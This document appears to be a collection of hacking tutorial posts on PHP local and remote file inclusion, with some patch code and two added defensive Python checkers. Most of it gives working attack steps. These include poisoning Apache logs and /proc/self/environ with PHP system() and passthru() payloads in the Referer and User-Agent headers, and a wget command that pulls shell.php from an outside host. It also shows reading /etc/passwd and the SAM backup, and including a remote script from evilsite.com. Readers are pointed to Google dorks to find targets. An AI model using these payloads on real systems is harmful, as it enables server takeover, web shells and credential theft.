Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge. I found one of the pages vulnerable to SQL injection, injected it, extracted the admin's credentials, and as soon as I logged in to the "Admin Panel" I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that, but they weren't working or weren't there. 🙁 ..

The only thing I hadn't tried was LFI log file poisoning, but it was time to unchain the beast ..
I included the Apache HTTP configuration file and looked for the error/access log. Interestingly, instead of a .log file, I found a piped bash script ..

Me likey 🙂 .. Then, of course, I included the bash script. These were its contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

# Reads one log line per iteration from Apache (piped via ErrorLog "|...") and stops at the first empty line.
while : ; do
    read line
    [ -z "$line" ] && exit

    # The virtual host is taken from a "[host:domain.tld]" tag at the start of the line.
    DOMAIN=""
    if [[ "$line" =~ \[host:([^\]]+) ]]; then
        DOMAIN=${BASH_REMATCH[1]}
    fi

    # Lines with a host tag go to that domain's per-day error log, the rest to a shared one.
    if [ -n "$DOMAIN" ]; then
        echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
        chown apache:apache "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
    else
        echo "${line}" >> "/var/www/html/error_${DATE}.log"
        chown apache:apache "/var/www/html/error_${DATE}.log"
    fi
done

What does this do? It creates a .log file in "/var/www/html/domain.tld/logs/" named "error_YYYY-MM-DD.log" (the domain comes from the "[host:...]" tag at the start of each line; lines without one go to /var/www/html/error_YYYY-MM-DD.log). According to the Apache config, the URL, Referer and time of each error were piped to this bash script, which then appended them to that file. So I just had to visit a non-existent page (to get a 404) with my Referer set to "<?php system('wget http://x.com/y.txt -O z.php'); ?>" or any of its equivalents .. and then include the .log file to execute the code 😉

curl -e '<?php system($_POST["x"]); ?>' http://domain.tld/blablabla.ext

curl --data "x=cat /etc/passwd" 'http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log'

I guess we’re done here 😀

ps: after solving the challenge I found out the "official solution" was nothing like this; it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to successfully bypass that function and the other image-resizing functions .. there are various great articles written on that topic; here are some of them ..

Local File Inclusion LFI On Windows Server

In the previous post I showed you Local File Inclusion (LFI) on a Linux server; in this post I will show you LFI on a Windows server. I will not start with an introduction here; for the complete guide please refer to my old post.

What is a Local File Inclusion (LFI) vulnerability?

Local File Inclusion (LFI) is the inclusion of a local file available on the web server. The vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitized, an attacker can supply the location of well-known files and read those sensitive files.

Here is the vulnerable code.

<?php
    // Vulnerable on purpose: the value of ?page= reaches include() unchecked.
    if (isset($_GET['page']))
        include($_GET['page']);
?>

Here we can see that the script doesn't check which file is to be included, so we are free to include any file by changing the value of the 'page' GET variable.

Finding a Local File Inclusion (LFI) vulnerability in a website

Now we are going to look for a local file inclusion. Say we have found a website; let's check whether it is vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we get an error, so there is a good chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

On Linux we include /etc/passwd, but on a Windows server we include /windows/repair/sam; repair/sam is a backup of the SAM file.

http://localhost/test.php?page=../../windows/repair/sam

If the file is not found, you have to move one directory up at a time by adding ../

So, as you all know, with Local File Inclusion (LFI) an attacker can include sensitive files. Now let us get a shell on the web server.

For this we will send some errors to the web server's logs by using PHP code.

<?php passthru($_GET['cmd']); ?>

You can also exploit this using system(), exec(), shell_exec(), etc. These functions are offered by PHP to execute system-level commands.

Here I am going to use telnet to inject the malicious code into the log files as an error.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

This script is now saved in the web server's log, and we have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

Now, after including the log file, you can execute system-level commands, like:

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

So now you can wget a shell and download it to the web root.

Hope you enjoyed this session and learned something. Thanks for reading, guys. Keep learning 😉

Remote File Inclusion RFI Attack

In this session you will learn how to exploit a Remote File Inclusion (RFI) vulnerability. So, let's start with the basic concepts and an introduction.

What Is Remote File Inclusion?

RFI stands for Remote File Inclusion; it allows an attacker to include a custom-coded/malicious file on a website or server through a script. The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server, or code execution on the website (an XSS attack using JavaScript) *client-side shiZ*.

RFI is a common vulnerability, and trust me, not all website hacking is about SQL injection. Using RFI you can literally deface *if that's what you're looking for 😐* the website, get access to the server and do almost anything. What makes it more dangerous is that you only need common sense and basic knowledge of PHP to execute this one; some Bash might come in handy, as most servers today are hosted on Linux.

Read More : Local File Inclusion Attack

Starting with RFI

Let's get started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you can't find one, don't worry, you'll still learn 😀 – just upload this to any site and save it as index.php in a folder called rfi.

<?php
# Infoseczone's RFI Tutorial @ infoseczone
# Vulnerable on purpose: the "file" parameter is passed to include() unchecked.
$file = $_GET['file'];
if ($file != null) { include($file . ".html"); }
?>

and save this as tut.html

<html>
<body>
<center><h1>RFI</h1></center>
</body>
</html>

then visit http://yoursite.com/rfi/index.php?file=tut

As you can see, this code (index.php) takes the document name from the file parameter, appends .html to it and includes it.
If this isn't coded properly, the script doesn't check where the file is coming from, so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let's try it out.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt
Warning: include(http://evilsite.com/evilscript.txt.html): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4

Just as we have %00 to get rid of the .html part in LFI, you have the "?" sign in RFI. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.html, because the ? sign turns the appended .html into a GET argument, which does not affect which file you are requesting from the remote server.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?

Patching Remote File Inclusion Vulnerability

Method One (Switch Statement)

<?php
// Only the three known pages can ever be included; the parameter never reaches include() itself.
$file = isset($_GET['file']) ? $_GET['file'] : '';
switch ($file) {            // the original switched on $page, which is never set, so every request hit the default
    case "about":
        include("aboutus.html");
        break;
    case "contact":
        include("contactus.html");
        break;
    default: # If parameter != contact or about
        include("tut.html");
        break;
}
?>

Method Two (If Statement)

<?php
if (isset($_GET['file']))
{
    $file = $_GET['file'];
    if ($file == "about")
    {
        include("aboutus.html");
    }
    elseif ($file == "contact")
    {
        include("contactus.html");
    }
    else # If parameter != contact or about
    {
        include("tut.html");
    }
}
?>
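A path-confinement check for the unchecked ?page= include in the LFI post above and the appended-suffix include($file . ".html") in this one, as an added example in Python rather than the tutorials' own PHP; the include directory /var/www/pages is an assumption. Unlike the allowlists above it accepts any file beneath one directory, while rejecting the %00 and trailing-? tricks and the ../ traversal these posts rely on.

```python
import os
import re
from urllib.parse import unquote

# Assumed include directory for this example; not a path from the tutorials above.
BASE_DIR = os.path.realpath("/var/www/pages")
# A URL scheme or stream wrapper (http://, php://, data:, ...) must never reach include().
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*:")

def resolve_include(page: str, base_dir: str = BASE_DIR, suffix: str = ".html") -> str:
    """Return the absolute path that include($page . ".html") may open.

    Raises ValueError for the inputs the tutorials rely on: a remote URL, a NUL
    byte (%00) that truncates the appended suffix, a trailing "?" that turns the
    suffix into a query string, and ../ traversal that leaves base_dir.
    """
    value = unquote(page)  # PHP hands $_GET over already decoded, so %00 -> NUL
    if not value:
        raise ValueError("empty page parameter")
    if "\0" in value:
        raise ValueError("NUL byte in page parameter")
    if SCHEME_RE.match(value) or value.startswith("//"):
        raise ValueError("URL or stream wrapper in page parameter")
    if "?" in value or "#" in value:
        raise ValueError("query or fragment characters in page parameter")
    # Normalise lexically, then confine to base_dir; if base_dir may hold
    # symlinks, realpath() the final file as well before opening it.
    candidate = os.path.normpath(os.path.join(base_dir, value + suffix))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        raise ValueError("path escapes the include directory")
    return candidate

def is_allowed(page: str) -> bool:
    """True when resolve_include() accepts page; usable as a request filter."""
    try:
        resolve_include(page)
    except ValueError:
        return False
    return True

if __name__ == "__main__":
    for sample in ["contact", "../../../../../etc/passwd", "../../../etc/passwd%00",
                   "http://evilsite.com/evilscript.txt?", "../logs/access.log"]:
        print(f"{sample!r:45} -> {is_allowed(sample)}")
```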

Thanks for reading. Keep learning some good stuff 😀

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss the local file inclusion vulnerability, how it occurs and how it can be patched. First let me start with an introduction to file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised files on the web server and execute malicious code through a vulnerable use of 'include'.

What is a Local File Inclusion (LFI) vulnerability?

Local File Inclusion (LFI) is the inclusion of a local file available on the web server. The vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitised, an attacker can supply the location of well-known files and read those sensitive files.

Finding a Local File Inclusion (LFI) vulnerability in a website

Now we are going to look for a local file inclusion. Say we have found a website; let's check whether it is vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we get an error, so there is a good chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

Now let's check for /etc/passwd to see if it is vulnerable to Local File Inclusion. Let's make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

We get an error and no /etc/passwd file:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

So we go more directories up ..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you get a page like this, you have successfully included the /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file; our next step is to include /proc/self/environ. Replace /etc/passwd with /proc/self/environ as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this, you have successfully included /proc/self/environ.

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vulnerablewebsite.com Port 80

/proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not accessible or the OS is FreeBSD.

Injecting malicious code into a Local File Inclusion vulnerable website

Now let's inject our malicious code into /proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now tamper this request, put your uploader script in the User-Agent and submit. After submitting you will get an uploader on the /proc/self/environ page; just browse and upload your shell.

You can also get your shell onto the server by downloading it remotely with the wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in the User-Agent and request the page. Our command is executed through system(), downloads the .txt shell from www.shell.com/shell.txt and saves it as shell.php in the website directory, so our shell is created. If it doesn't work, try exec(), because system() can be disabled on the web server from php.ini.
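Detection logic for the two poisoning vectors used on this page (a PHP tag in the Referer that the first post's script writes into the error log, and one in the User-Agent read back through /proc/self/environ here), as an added example that is not part of the original posts. It parses Apache combined-format access log lines and flags PHP open tags in client-controlled headers plus ../ traversal to a log file or /proc/self/environ; the sample lines are constructed, and the dated log name is assumed.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A PHP open tag (<?php, <?=, or the short <?) in a client-controlled header is the poison itself.
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)
# ../ traversal ending in one of the files the posts read back through include().
INCLUDE_TARGET_RE = re.compile(
    r"\.\./.*?(access\.log|error[^/ ]*\.log|proc/self/environ)", re.IGNORECASE
)

# Constructed sample lines; the first three replay the requests from the posts above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /blablabla.ext HTTP/1.1" 404 209 "<?php system($_POST['x']); ?>" "curl/7.88.1"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_2023-10-10.log HTTP/1.1" 200 1832 "-" "curl/7.88.1"
198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 4210 "-" "<?system('wget www.shell.com/shell.txt -O shell.php');?>"
192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "http://www.example.com/" "Mozilla/5.0"
"""

def classify(line: str) -> list:
    """Return the findings for one combined-format access log line."""
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparseable_line"]
    findings = []
    if PHP_TAG_RE.search(m["referer"]):
        findings.append("php_tag_in_referer")
    if PHP_TAG_RE.search(m["agent"]):
        findings.append("php_tag_in_user_agent")
    # Decode %2e%2e%2f-style encoding first; PHP sees the decoded value too.
    if INCLUDE_TARGET_RE.search(unquote(m["request"])):
        findings.append("include_of_log_or_environ")
    return findings

def scan(lines):
    """Return (client_ip, request, findings) for every line with a finding."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        findings = classify(line)
        if findings:
            m = COMBINED_RE.match(line)
            hits.append((m["ip"] if m else "?", m["request"] if m else line, findings))
    return hits
```

A 404 with a PHP tag in the Referer followed by an include of that day's error log from the same client, as in the first two sample lines, is the full poisoning sequence and is worth alerting on as one incident.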

Accessing our shell

Now let's check whether our malicious code was successfully injected. Let's check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. The injection was successful.

So I think everybody enjoyed this tutorial. Keep practising and learning. 🙂